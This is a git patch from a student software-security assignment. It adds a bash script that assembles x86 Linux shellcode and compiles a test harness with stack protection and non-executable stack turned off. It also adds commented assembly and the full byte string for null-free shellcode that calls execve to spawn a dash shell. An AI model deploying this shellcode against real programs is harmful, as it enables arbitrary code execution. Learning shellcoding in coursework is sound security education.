From 66487892604269aaf18d2e1756a918de3cb90d22 Mon Sep 17 00:00:00 2001 From: Sascha Tommasone Date: Sat, 8 Jun 2024 18:19:10 +0200 Subject: [PATCH] [Assignment-5] added solution task 3 (shellcode) --- .../shellcode/exploit | 16 ++++++++++++ .../shellcode/shellcode.asm | 26 +++++++++++++++---- 2 files changed, 37 insertions(+), 5 deletions(-) create mode 100755 Assignment 5 - Software Security - Teil 1/shellcode/exploit diff --git a/Assignment 5 - Software Security - Teil 1/shellcode/exploit b/Assignment 5 - Software Security - Teil 1/shellcode/exploit new file mode 100755 index 0000000..d67b812 --- /dev/null +++ b/Assignment 5 - Software Security - Teil 1/shellcode/exploit @@ -0,0 +1,16 @@ +#!/bin/bash + +# assemble shellcode +nasm -felf32 shellcode.asm -o x.o && ld -m elf_i386 x.o -o shellcode &> /dev/null + +# remove object file +rm x.o + +# extract shellcode and remove binary +shellcode=$(for byte in $(objdump -d ./shellcode | grep "^ " | cut -f2); do echo -n '\x'$byte; done) +rm shellcode + +# TODO place shellcode into test_shellcode.c and shellcode.asm + +# compile test_shellcode.c and execute it afterwards +gcc -o test_shellcode -m32 -fno-stack-protector -fno-pie -z execstack -O0 test_shellcode.c && ./test_shellcode diff --git a/Assignment 5 - Software Security - Teil 1/shellcode/shellcode.asm b/Assignment 5 - Software Security - Teil 1/shellcode/shellcode.asm index 310f6cf..273cc01 100644 --- a/Assignment 5 - Software Security - Teil 1/shellcode/shellcode.asm +++ b/Assignment 5 - Software Security - Teil 1/shellcode/shellcode.asm @@ -1,8 +1,24 @@ -; SHELLCODE: "\x90\x90\x90..." +; SHELLCODE: "\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80" -global _start +section .text + global _start + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; https://rayoflightz.github.io/shellcoding/linux/x86/2018/11/15/Shellcoding-for-linux-on-x86.html ; +; https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit ; +; https://man7.org/linux/man-pages/man2/execve.2.html ; +; https://www.ascii-code.com/ ; +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; _start: - ;---------------------------------- - nop; - ; ------------ End of file ------------ + xor eax, eax ; set eax to NULL without terminating the shellcode later + push eax ; push a null byte onto the stack as the string terminator + push 0x68736164 ; push the ASCII values for 'dash' onto the stack in reverse order (due to little endian) + push 0x2f2f2f2f ; push the ASCII values for '////' onto the stack in reverse order " + push 0x6e69622f ; push the ASCII values for '/bin' onto the stack in reverse order " + mov ebx, esp ; set ebx to the address of the '/bin////dash' string (top of the stack) + mov ecx, eax ; set ecx to NULL (=> char *const _Nullable argv[] is NULL) + mov edx, eax ; set edx to NULL (=> char *const _Nullable envp[] is NULL) + mov al, 0xb ; load the syscall number for execve (11) into lowest 8 bits of eax to prevent null bytes in shellcode + int 0x80 ; trigger the kernel interrupt to execute the syscall +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;